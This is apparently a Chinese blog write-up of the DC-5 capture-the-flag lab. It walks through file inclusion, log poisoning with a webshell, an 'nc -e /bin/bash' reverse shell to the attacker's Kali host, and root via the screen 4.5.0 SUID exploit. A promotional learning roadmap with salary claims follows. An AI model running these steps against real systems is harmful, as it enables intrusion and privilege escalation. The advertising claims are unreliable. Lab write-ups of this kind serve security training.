下载环境导入靶机,在kali里面扫描靶机ip地址靶机IP:192.168.190.133
扫描端口:开放了两个tcp端口,我们访问一下ip
在下载靶机的时候说明了只有一个flag,我们在页面试试,发现contact页面评论后会出现thankyou.php
而且每次刷新下方的显示不同,扫描一下后台
访问footer.php
同样是每次刷新后内容不同,那猜测下方的年份显示可能是调用文件后返回的数值,尝试一下文件包含,发现成功文件包含
因为靶机服务扫描时发现靶机网站使用的是nginx服务器,我们知道nginx服务器的默认配置文件是
/etc/nginx/nginx.conf
,所以将nginx的配置文件包含过来查看日志路径,发现了nginx的日志路径:
access_log /var/log/nginx/access.log; error_log
/var/log/nginx/error.log;向日志文件传输一句话木马让其进行解析,使用burpsuite抓包改包向日志文件传入一句话木马
使用蚁剑连接
使用虚拟终端反弹shell,蚁剑虚拟终端输入nc
-e /bin/bash 192.168.190.133(kali ip地址) 777,kali监听7777
端口
切换shell外壳
python -c 'import pty;pty.spawn("/bin/bash")'
然后进行提权,使用命令find / -user root -perm -4000 -print 2>/dev/null
,查看是否有可利用的suid
这里不知道哪个有用就看了大佬们的wp,发现screen-4.5.0有漏洞可以利用,使用命令:
searchsploit screen 4.5.0
将文件cp出来
41154.sh:
查看文件可以知道,脚本文件需要分3个步骤完成
第一步:将第一部分diam写入libhax.c文件中,在执行相应的命令生成libhax.so文件第二步:将第二部分的C语言代码写入rootshell文件中,并编译成rooshell文件
第三步:将剩下部分的脚本代码写入到dc5.sh文件中,在开头加上
#!/bin/bash
注明执行环境,保存需要输入为set ff=unix
,是为了防止脚本的格式错误查看dc5.sh文件并加上可执行权限
将生成的三个文件通过蚁剑上传到根目录下的/tmp/下
然后在反弹shell中使用命令执行dc5.sh文件,命令
chmod +x dc5.sh
增加可执行权限,执行文件查看权限:
切换到/root下拿到flag:
YF3ZF-1691114888344)]
网络安全学习路线
这是一份网络安全从零基础到进阶的学习路线大纲全览,小伙伴们记得点个收藏!
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DSAeb5TM-1691114888344)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]编辑
阶段一:基础入门
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IvJ3iWCt-1691114888345)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]
网络安全导论
渗透测试基础
网络基础
操作系统基础
Web安全基础
数据库基础
编程基础
CTF基础
该阶段学完即可年薪15w+
阶段二:技术进阶(到了这一步你才算入门)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lFkbh801-1691114888346)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]
弱口令与口令爆破
XSS漏洞
CSRF漏洞
SSRF漏洞
XXE漏洞
SQL注入
任意文件操作漏洞
业务逻辑漏洞
该阶段学完年薪25w+
阶段三:高阶提升
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KayghE3d-1691114888346)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]
反序列化漏洞
RCE
综合靶场实操项目
内网渗透
流量分析
日志分析
恶意代码分析
应急响应
实战训练
该阶段学完即可年薪30w+
阶段四:蓝队课程
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hvSrgYPu-1691114888346)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]
蓝队基础
蓝队进阶
该部分主攻蓝队的防御,即更容易被大家理解的网络安全工程师。
攻防兼备,年薪收入可以达到40w+
阶段五:面试指南&阶段六:升级内容
需要上述路线图对应的网络安全配套视频、源码以及更多网络安全相关书籍&面试题等内容
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
同学们可以扫描下方二维码获取哦!
